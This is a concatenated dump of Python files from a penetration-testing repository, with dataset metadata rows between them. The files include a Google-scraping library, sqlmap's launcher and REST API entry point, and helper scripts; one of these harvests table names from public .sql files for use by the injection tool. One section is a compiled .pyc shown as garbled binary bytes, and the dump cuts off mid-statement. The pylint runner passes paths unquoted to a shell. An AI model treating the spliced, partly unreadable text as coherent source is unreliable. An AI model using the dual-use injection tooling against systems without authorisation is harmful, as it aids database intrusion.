desc_strs = [] def looper(tag): if not tag: return for t in tag: try: if t.name == 'br': break except AttributeError: pass try: desc_strs.append(t.string) except AttributeError: desc_strs.append(t) looper(desc_div) looper(desc_div.find('wbr')) # BeautifulSoup does not self-close <wbr> desc = ''.join(s for s in desc_strs if s) return self._html_unescape(desc) def _html_unescape(self, str): def entity_replacer(m): entity = m.group(1) if entity in name2codepoint: return unichr(name2codepoint[entity]) else: return m.group(0) def ascii_replacer(m): cp = int(m.group(1)) if cp <= 255: return unichr(cp) else: return m.group(0) s = re.sub(r'&#(\d+);', ascii_replacer, str, re.U) return re.sub(r'&([^;]+);', entity_replacer, s, re.U)
7,660
Python
.py
198
29.050505
120
0.567269
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,923
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/__init__.py
#!/usr/bin/python # # Peteris Krumins (peter@catonmat.net) # http://www.catonmat.net -- good coders code, great reuse # # A Google Python library: # http://www.catonmat.net/blog/python-library-for-google-search/ # # Distributed under MIT license: # # Copyright (c) 2009 Peteris Krumins # # Permission is hereby granted, free of charge, to any person # Obtaining a copy of this software and associated documentation # Files (the "Software"), to deal in the Software without # Restriction, including without limitation the rights to use, # Copy, modify, merge, publish, distribute, sublicense, and/or sell # Copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # Conditions: # # The above copyright notice and this permission notice shall be # Included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. #
1,354
Python
.py
33
40
67
0.783333
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,924
googlesets.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/googlesets.py
#!/usr/bin/python # # Peteris Krumins (peter@catonmat.net) # http://www.catonmat.net -- good coders code, great reuse # # http://www.catonmat.net/blog/python-library-for-google-sets/ # # Code is licensed under MIT license. # import re import urllib import random from htmlentitydefs import name2codepoint from BeautifulSoup import BeautifulSoup from browser import Browser, BrowserError class GSError(Exception): """ Google Sets Error """ pass class GSParseError(Exception): """ Parse error in Google Sets results. self.msg attribute contains explanation why parsing failed self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse Thrown only in debug mode """ def __init__(self, msg, tag): self.msg = msg self.tag = tag def __str__(self): return self.msg def html(self): return self.tag.prettify() LARGE_SET = 1 SMALL_SET = 2 class GoogleSets(object): URL_LARGE = "http://labs.google.com/sets?hl=en&q1=%s&q2=%s&q3=%s&q4=%s&q5=%s&btn=Large+Set" URL_SMALL = "http://labs.google.com/sets?hl=en&q1=%s&q2=%s&q3=%s&q4=%s&q5=%s&btn=Small+Set+(15+items+or+fewer)" def __init__(self, items, random_agent=False, debug=False): self.items = items self.debug = debug self.browser = Browser(debug=debug) if random_agent: self.browser.set_random_user_agent() def get_results(self, set_type=SMALL_SET): page = self._get_results_page(set_type) results = self._extract_results(page) return results def _maybe_raise(self, cls, *arg): if self.debug: raise cls(*arg) def _get_results_page(self, set_type): if set_type == LARGE_SET: url = GoogleSets.URL_LARGE else: url = GoogleSets.URL_SMALL safe_items = [urllib.quote_plus(i) for i in self.items] blank_items = 5 - len(safe_items) if blank_items > 0: safe_items += ['']*blank_items safe_url = url % tuple(safe_items) try: page = self.browser.get_page(safe_url) except BrowserError, e: raise GSError, "Failed getting %s: %s" % (e.url, e.error) return BeautifulSoup(page) def _extract_results(self, soup): a_links = soup.findAll('a', href=re.compile('/search')) ret_res = [a.string for a in a_links] return ret_res
2,548
Python
.py
69
29.231884
116
0.625719
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,925
search.pyc
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/search.pyc
Ñò ðÝ»Mc@s§ddkZddkZddklZddklZddklZlZdefd„ƒYZ de fd„ƒYZ d d d „ƒYZ d e fd „ƒYZ dS(iÿÿÿÿN(tname2codepoint(t BeautifulSoup(tBrowsert BrowserErrort SearchErrorcBseZdZRS(s2 Base class for Google Search exceptions. (t__name__t __module__t__doc__(((s"/pentest/plecost/xgoogle/search.pyRst ParseErrorcBs)eZdZd„Zd„Zd„ZRS(sê Parse error in Google results. self.msg attribute contains explanation why parsing failed self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse Thrown only in debug mode cCs||_||_dS(N(tmsgttag(tselfR R ((s"/pentest/plecost/xgoogle/search.pyt__init__ s cCs|iS(N(R (R ((s"/pentest/plecost/xgoogle/search.pyt__str__$scCs |iiƒS(N(R tprettify(R ((s"/pentest/plecost/xgoogle/search.pythtml's(RRRR R R(((s"/pentest/plecost/xgoogle/search.pyRs  t SearchResultcBseZd„Zd„ZRS(cCs||_||_||_dS(N(ttitleturltdesc(R RRR((s"/pentest/plecost/xgoogle/search.pyR +s  cCs d|iS(NsGoogle Search Result: "%s"(R(R ((s"/pentest/plecost/xgoogle/search.pyR 0s(RRR R (((s"/pentest/plecost/xgoogle/search.pyR*s t GoogleSearchcBsÑeZdZdZdZdZeed„Zed„ƒZ d„Z d„Z ee e ƒZ d„Z d „Zee eƒZd „Zd „Zd „Zd „Zd„Zd„Zd„Zd„Zd„ZRS(sAhttp://www.google.com/search?hl=en&q=%(query)s&btnG=Google+Searchs>http://www.google.com/search?hl=en&q=%(query)s&start=%(start)dsMhttp://www.google.com/search?hl=en&q=%(query)s&num=%(num)d&btnG=Google+SearchsJhttp://www.google.com/search?hl=en&q=%(query)s&num=%(num)d&start=%(start)dcCsm||_||_td|ƒ|_d|_t|_d|_d|_ d|_ |o|ii ƒndS(Ntdebugii ( tqueryRRtbrowsertNonet results_infotFalseteort_paget_results_per_paget _last_fromtset_random_user_agent(R Rt random_agentR((s"/pentest/plecost/xgoogle/search.pyR 9s       cCsX|ipC|iƒ}|i|ƒ|_|iddjo t|_qMn|idS(Nttotali(Rt_get_results_paget _extract_infotTrueR(R tpage((s"/pentest/plecost/xgoogle/search.pyt num_resultsFs   cCs|iS(N(R(R ((s"/pentest/plecost/xgoogle/search.pyt _get_pageOscCs ||_dS(N(R(R R%((s"/pentest/plecost/xgoogle/search.pyt _set_pageRscCs|iS(N(R(R ((s"/pentest/plecost/xgoogle/search.pyt_get_results_per_pageWscCs ||_dS(N(R(R trpp((s"/pentest/plecost/xgoogle/search.pyt_set_results_par_pageZscCs÷|iogS|iƒ}|i|ƒ}|ip+||_|idjot|_gSn|i|ƒ}|pt|_gS|idjo"|d|ijot|_gS|d|djo t|_n|id7_|d|_|S(s Gets a page of results itfromttoR!i( RR"R#RR&R$t_extract_resultsRR(R R%t search_infotresults((s"/pentest/plecost/xgoogle/search.pyt get_results_s*       $   cGs|io||Œ‚ndS(N(R(R tclstarg((s"/pentest/plecost/xgoogle/search.pyt _maybe_raisexs cCsé|idjo*|idjo ti}q`ti}n'|idjo ti}n ti}|hti|i ƒd6|i|id6|id6}y|i i |ƒ}Wn.t j o"}t d|i|if‚nXt|ƒS(Nii RtstarttnumsFailed getting %s: %s(RRRt SEARCH_URL_0t SEARCH_URL_1t NEXT_PAGE_0t NEXT_PAGE_1turllibt quote_plusRRtget_pageRRRterrorR(R Rtsafe_urlR%te((s"/pentest/plecost/xgoogle/search.pyR"|s    cCshdd6dd6dd6}|idddƒ}|p|itd|ƒ|S|id ƒ}|p|itd |ƒ|Sd i|id tƒƒ}|id d ƒ}tid|ti ƒ}|p|Sht |i dƒƒd6t |i dƒƒd6t |i dƒƒd6S(NiR,R-R!tdivtidtssbs>Div with number of results was not found on Google search pagetpsA<p> tag within <div id="ssb"> was not found on Google search pagetttextt,s)Results (\d+) - (\d+) of (?:about )?(\d+)iii( tfindR4RtjointfindAllR$treplacetretsearchtUtinttgroup(R tsoupt empty_infotdiv_ssbRDttxttmatches((s"/pentest/plecost/xgoogle/search.pyR#“scCs[|idhdd6ƒ}g}x5|D]-}|i|ƒ}|o|i|ƒq&q&W|S(Ntlitgtclass(RJt_extract_resulttappend(R RQR0tret_restresultteres((s"/pentest/plecost/xgoogle/search.pyR.¤scCsQ|i|ƒ\}}|i|ƒ}| p| p| odSt|||ƒS(N(t_extract_title_urlt_extract_descriptionRR(R R\RRR((s"/pentest/plecost/xgoogle/search.pyRY­s cCs¡|idƒ}|p|itd|ƒdSdi|idtƒƒ}|i|ƒ}|d}ti d|ƒ}|ot i |i dƒƒ}n||fS( Ntas/Title tag in Google search result was not foundRERFthrefs/url\?q=(http[^&]+)&i(NN( RHR4RRRIRJR$t_html_unescapeRLtmatchR;tunquoteRP(R R\ttitle_aRRRc((s"/pentest/plecost/xgoogle/search.pyR^´s cs™|idhtidƒd6ƒ}|p|itd|ƒdSg‰‡fd†}||ƒ||idƒƒdid„ˆDƒƒ}|i|ƒS( NRAs\bs\bRXs5Description tag in Google search result was not foundc s‡|pdSxt|D]l}y|idjoPnWntj onXyˆi|iƒWqtj oˆi|ƒqXqWdS(Ntbr(tnametAttributeErrorRZtstring(R tt(t desc_strs(s"/pentest/plecost/xgoogle/search.pytlooperÉs twbrREcss$x|]}|o |VqqWdS(N((t.0ts((s"/pentest/plecost/xgoogle/search.pys <genexpr>Ùs (RHRLtcompileR4RRRIRb(R R\tdesc_divRlR((Rks"/pentest/plecost/xgoogle/search.pyR_Âs" cCsFd„}d„}tid||tiƒ}tid||tiƒS(NcSs<|idƒ}|tjott|ƒS|idƒSdS(Nii(RPRtunichr(tmtentity((s"/pentest/plecost/xgoogle/search.pytentity_replacerÝs cSs>t|idƒƒ}|djo t|ƒS|idƒSdS(Niiÿi(RORPRr(Rstcp((s"/pentest/plecost/xgoogle/search.pytascii_replaceräs  s&#(\d+);s &([^;]+);(RLtsubRN(R tstrRuRwRo((s"/pentest/plecost/xgoogle/search.pyRbÜs  (RRR7R9R8R:RR tpropertyR&R'R(R%R)R+tresults_per_pageR1R4R"R#R.RYR^R_Rb(((s"/pentest/plecost/xgoogle/search.pyR3s*            ((RLR;thtmlentitydefsRRRRRt ExceptionRRRtobjectR(((s"/pentest/plecost/xgoogle/search.pyt<module> s  
9,179
Python
.py
42
216.833333
1,181
0.385861
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,926
sqlmap.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/sqlmap.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import bdb import inspect import logging import os import re import sys import time import traceback import warnings warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning) warnings.filterwarnings(action="ignore", category=DeprecationWarning) from lib.utils import versioncheck # this has to be the first non-standard import from lib.controller.controller import start from lib.core.common import banner from lib.core.common import createGithubIssue from lib.core.common import dataToStdout from lib.core.common import getUnicode from lib.core.common import maskSensitiveData from lib.core.common import setColor from lib.core.common import setPaths from lib.core.common import weAreFrozen from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.common import unhandledExceptionMessage from lib.core.exception import SqlmapBaseException from lib.core.exception import SqlmapShellQuitException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapUserQuitException from lib.core.option import initOptions from lib.core.option import init from lib.core.profiling import profile from lib.core.settings import LEGAL_DISCLAIMER from lib.core.testing import smokeTest from lib.core.testing import liveTest from lib.parse.cmdline import cmdLineParser from lib.utils.api import setRestAPILog from lib.utils.api import StdDbOut def modulePath(): """ This will get us the program's directory, even if we are frozen using py2exe """ try: _ = sys.executable if weAreFrozen() else __file__ except NameError: _ = inspect.getsourcefile(modulePath) return os.path.dirname(os.path.realpath(getUnicode(_, sys.getfilesystemencoding()))) def main(): """ Main function of sqlmap when running from command line. """ try: paths.SQLMAP_ROOT_PATH = modulePath() setPaths() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if hasattr(conf, "api"): # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() banner() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() if conf.profile: profile() elif conf.smokeTest: smokeTest() elif conf.liveTest: liveTest() else: start() except SqlmapUserQuitException: errMsg = "user quit" logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getUnicode(ex.message) logger.critical(errMsg) sys.exit(1) except KeyboardInterrupt: print errMsg = "user aborted" logger.error(errMsg) except EOFError: print errMsg = "exit" logger.error(errMsg) except SystemExit: pass except: print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') file_ = re.sub(r"\.\./", '/', file_).lstrip('/') excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) logger.critical(errMsg) kb.stickyLevel = logging.CRITICAL dataToStdout(excMsg) createGithubIssue(errMsg, excMsg) finally: if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) kb.threadContinue = False kb.threadException = True if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() main() if hasattr(conf, "api"): try: conf.database_cursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program if conf.get("threads", 0) > 1 or conf.get("dnsServer"): os._exit(0) if __name__ == "__main__": main()
5,343
Python
.py
148
29.135135
103
0.674612
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,927
sqlmapapi.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/sqlmapapi.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import logging import optparse from sqlmap import modulePath from lib.core.common import setPaths from lib.core.data import paths from lib.core.data import logger from lib.utils.api import client from lib.utils.api import server RESTAPI_SERVER_HOST = "127.0.0.1" RESTAPI_SERVER_PORT = 8775 if __name__ == "__main__": """ REST-JSON API main function """ # Set default logging level to debug logger.setLevel(logging.DEBUG) # Initialize path variable paths.SQLMAP_ROOT_PATH = modulePath() setPaths() # Parse command line options apiparser = optparse.OptionParser() apiparser.add_option("-s", "--server", help="Act as a REST-JSON API server", default=RESTAPI_SERVER_PORT, action="store_true") apiparser.add_option("-c", "--client", help="Act as a REST-JSON API client", default=RESTAPI_SERVER_PORT, action="store_true") apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server", default=RESTAPI_SERVER_HOST, action="store") apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server", default=RESTAPI_SERVER_PORT, type="int", action="store") (args, _) = apiparser.parse_args() # Start the client or the server if args.server is True: server(args.host, args.port) elif args.client is True: client(args.host, args.port) else: apiparser.print_help()
1,534
Python
.py
38
36.526316
142
0.709005
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,928
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,929
duplicates.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/shutils/duplicates.py
#!/usr/bin/env python # Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission # Removes duplicate entries in wordlist like files import sys if len(sys.argv) > 0: items = list() with open(sys.argv[1], 'r') as f: for item in f.readlines(): item = item.strip() try: str.encode(item) if item in items: if item: print item else: items.append(item) except: pass with open(sys.argv[1], 'w+') as f: f.writelines("\n".join(items))
681
Python
.py
21
22
64
0.521407
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,930
regressiontest.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/shutils/regressiontest.py
#!/usr/bin/env python # Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission import codecs import inspect import os import re import smtplib import subprocess import sys import time import traceback from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe())))) from lib.core.revision import getRevisionNumber START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) SQLMAP_HOME = "/opt/sqlmap" REVISION = getRevisionNumber() SMTP_SERVER = "127.0.0.1" SMTP_PORT = 25 SMTP_TIMEOUT = 30 FROM = "regressiontest@sqlmap.org" #TO = "dev@sqlmap.org" TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION) TARGET = "debian" def prepare_email(content): global FROM global TO global SUBJECT msg = MIMEMultipart() msg["Subject"] = SUBJECT msg["From"] = FROM msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) msg.attach(MIMEText(content)) return msg def send_email(msg): global SMTP_SERVER global SMTP_PORT global SMTP_TIMEOUT try: s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT) s.sendmail(FROM, TO, msg.as_string()) s.quit() # Catch all for SMTP exceptions except smtplib.SMTPException, e: print "Failure to send email: %s" % str(e) def failure_email(msg): msg = prepare_email(msg) send_email(msg) sys.exit(1) def main(): global SUBJECT content = "" test_counts = [] attachments = {} updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = updateproc.communicate() if stderr: failure_email("Update of sqlmap failed with error:\n\n%s" % stderr) regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False) stdout, stderr = regressionproc.communicate() if stderr: failure_email("Execution of regression test failed with error:\n\n%s" % stderr) failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) for failed_test in failed_tests: title = failed_test[0] test_count = int(failed_test[1]) parse = failed_test[3] if failed_test[3] else None output_folder = failed_test[4] traceback = False if failed_test[5] == "False" else bool(failed_test[5]) detected = False if failed_test[6] else True test_counts.append(test_count) console_output_file = os.path.join(output_folder, "console_output") log_file = os.path.join(output_folder, TARGET, "log") traceback_file = os.path.join(output_folder, "traceback") if os.path.exists(console_output_file): console_output_fd = codecs.open(console_output_file, "rb", "utf8") console_output = console_output_fd.read() console_output_fd.close() attachments[test_count] = str(console_output) if os.path.exists(log_file): log_fd = codecs.open(log_file, "rb", "utf8") log = log_fd.read() log_fd.close() if os.path.exists(traceback_file): traceback_fd = codecs.open(traceback_file, "rb", "utf8") traceback = traceback_fd.read() traceback_fd.close() content += "Failed test case '%s' (#%d)" % (title, test_count) if parse: content += " at parsing: %s:\n\n" % parse content += "### Log file:\n\n" content += "%s\n\n" % log elif not detected: content += " - SQL injection not detected\n\n" else: content += "\n\n" if traceback: content += "### Traceback:\n\n" content += "%s\n\n" % str(traceback) content += "#######################################################################\n\n" end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) if content: content += end_string SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts)) msg = prepare_email(content) for test_count, attachment in attachments.items(): attachment = MIMEText(attachment) attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count) msg.attach(attachment) send_email(msg) else: SUBJECT = "Successful %s" % SUBJECT msg = prepare_email("All test cases were successful\n\n%s" % end_string) send_email(msg) if __name__ == "__main__": log_fd = open("/tmp/sqlmapregressiontest.log", "wb") log_fd.write("Regression test started at %s\n" % START_TIME) try: main() except Exception, e: log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc())) log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())) log_fd.close()
5,543
Python
.py
126
37.31746
221
0.630904
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,931
pylint.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/shutils/pylint.py
#! /usr/bin/env python # Runs pylint on all python scripts found in a directory tree # Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html import os import re import sys total = 0.0 count = 0 __RATING__ = False def check(module): global total, count if module[-3:] == ".py": print "CHECKING ", module pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') for line in pout: if re.match("E....:.", line): print line if __RATING__ and "Your code has been rated at" in line: print line score = re.findall("\d.\d\d", line)[0] total += float(score) count += 1 if __name__ == "__main__": try: print sys.argv BASE_DIRECTORY = sys.argv[1] except IndexError: print "no directory specified, defaulting to current working directory" BASE_DIRECTORY = os.getcwd() print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY for root, dirs, files in os.walk(BASE_DIRECTORY): if any(_ in root for _ in ("extra", "thirdparty")): continue for name in files: filepath = os.path.join(root, name) check(filepath) if __RATING__: print "==" * 50 print "%d modules found" % count print "AVERAGE SCORE = %.02f" % (total / count)
1,422
Python
.py
40
27.7
79
0.580175
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,932
sqlharvest.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/sqlharvest/sqlharvest.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import cookielib import re import socket import sys import urllib import urllib2 import ConfigParser from operator import itemgetter TIMEOUT = 10 CONFIG_FILE = 'sqlharvest.cfg' TABLES_FILE = 'tables.txt' USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)' SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic' MAX_FILE_SIZE = 2 * 1024 * 1024 # if a result (.sql) file for downloading is more than 2MB in size just skip it QUERY = 'CREATE TABLE ext:sql' REGEX_URLS = r';u=([^"]+?)&amp;q=' REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)' def main(): tables = dict() cookies = cookielib.CookieJar() cookie_processor = urllib2.HTTPCookieProcessor(cookies) opener = urllib2.build_opener(cookie_processor) opener.addheaders = [("User-Agent", USER_AGENT)] conn = opener.open(SEARCH_URL) page = conn.read() # set initial cookie values config = ConfigParser.ConfigParser() config.read(CONFIG_FILE) if not config.has_section("options"): config.add_section("options") if not config.has_option("options", "index"): config.set("options", "index", "0") i = int(config.get("options", "index")) try: with open(TABLES_FILE, 'r') as f: for line in f.xreadlines(): if len(line) > 0 and ',' in line: temp = line.split(',') tables[temp[0]] = int(temp[1]) except: pass socket.setdefaulttimeout(TIMEOUT) files, old_files = None, None try: while True: abort = False old_files = files files = [] try: conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10)) page = conn.read() for match in re.finditer(REGEX_URLS, page): files.append(urllib.unquote(match.group(1))) if len(files) >= 10: break abort = (files == old_files) except KeyboardInterrupt: raise except Exception, msg: print msg if abort: break sys.stdout.write("\n---------------\n") sys.stdout.write("Result page #%d\n" % (i + 1)) sys.stdout.write("---------------\n") for sqlfile in files: print sqlfile try: req = urllib2.Request(sqlfile) response = urllib2.urlopen(req) if "Content-Length" in response.headers: if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE: continue page = response.read() found = False counter = 0 for match in re.finditer(REGEX_RESULT, page): counter += 1 table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]') if table and not any(_ in table for _ in ('>', '<', '--', ' ')): found = True sys.stdout.write('*') if table in tables: tables[table] += 1 else: tables[table] = 1 if found: sys.stdout.write("\n") except KeyboardInterrupt: raise except Exception, msg: print msg else: i += 1 except KeyboardInterrupt: pass finally: with open(TABLES_FILE, 'w+') as f: tables = sorted(tables.items(), key=itemgetter(1), reverse=True) for table, count in tables: f.write("%s,%d\n" % (table, count)) config.set("options", "index", str(i + 1)) with open(CONFIG_FILE, 'w+') as f: config.write(f) if __name__ == "__main__": main()
4,332
Python
.py
110
27.227273
127
0.504891
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,933
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/sqlharvest/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,934
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/safe2bin/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,935
safe2bin.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/extra/safe2bin/safe2bin.py
#!/usr/bin/env python """ safe2bin.py - Simple safe(hex) to binary format converter Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import binascii import re import string import os import sys from optparse import OptionError from optparse import OptionParser # Regex used for recognition of hex encoded characters HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})" # Regex used for recognition of representation for hex encoded invalid unicode characters INVALID_UNICODE_CHAR_REGEX = r"(?P<result>\\\?[0-9A-Fa-f]{2})" # Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n) SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" # Characters that don't need to be safe encoded SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) # String used for temporary marking of slash characters SLASH_MARKER = "__SLASH__" def safecharencode(value): """ Returns safe representation of a given basestring value >>> safecharencode(u'test123') u'test123' >>> safecharencode(u'test\x01\x02\xff') u'test\\01\\02\\03\\ff' """ retVal = value if isinstance(value, basestring): if any(_ not in SAFE_CHARS for _ in value): retVal = retVal.replace('\\', SLASH_MARKER) for char in SAFE_ENCODE_SLASH_REPLACEMENTS: retVal = retVal.replace(char, repr(char).strip('\'')) retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) retVal = retVal.replace(SLASH_MARKER, "\\\\") elif isinstance(value, list): for i in xrange(len(value)): retVal[i] = safecharencode(value[i]) return retVal def safechardecode(value, binary=False): """ Reverse function to safecharencode """ retVal = value if isinstance(value, basestring): retVal = retVal.replace('\\\\', SLASH_MARKER) while True: match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) if match: retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) else: break for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: retVal = retVal.replace(repr(char).strip('\''), char) retVal = retVal.replace(SLASH_MARKER, '\\') if binary: if isinstance(retVal, unicode): retVal = retVal.encode("utf8") while True: match = re.search(INVALID_UNICODE_CHAR_REGEX, retVal) if match: retVal = retVal.replace(match.group("result"), chr(ord(binascii.unhexlify(match.group("result").lstrip("\\?"))))) else: break elif isinstance(value, (list, tuple)): for i in xrange(len(value)): retVal[i] = safechardecode(value[i]) return retVal def main(): usage = '%s -i <input file> [-o <output file>]' % sys.argv[0] parser = OptionParser(usage=usage, 